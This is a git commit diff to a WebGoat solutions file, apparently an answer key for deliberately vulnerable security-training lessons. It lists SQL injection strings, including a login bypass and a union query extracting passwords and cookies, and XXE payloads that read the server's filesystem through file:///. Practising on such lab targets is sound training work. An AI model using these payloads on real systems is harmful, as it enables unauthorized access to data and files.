update for XXE solutions

2017-06-27 08:27:06 -04:00 · 2017-06-27 08:27:06 -04:00 · 3a9bb946ed
commit 3a9bb946ed
parent 06a3f5d189
1 changed files with 4 additions and 1 deletions
--- a/webgoat-lessons/sol.txt
+++ b/webgoat-lessons/sol.txt
@ -3,6 +3,9 @@ Basic
 Smith  - to show it returns smith's records
 Smith' or '1'='1    - to show exploit; 1=1 can be any true clause
 **Bender Login
 bender@juice-sh.op' --
 [2:19 PM]  
 101
 101 or 1=1
@ -11,7 +14,7 @@ Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from
 ## XXE ##
-Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+Simple <?xml version="1.0" standalone="yes" ?><!DOCTYPE comment [<!ENTITY root SYSTEM "file:///"> ]><comment>  <text>&root;</text><password>test</password></comment>
 Modern Rest Framework - change content type to: Content-Type: application/xml && 
 <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>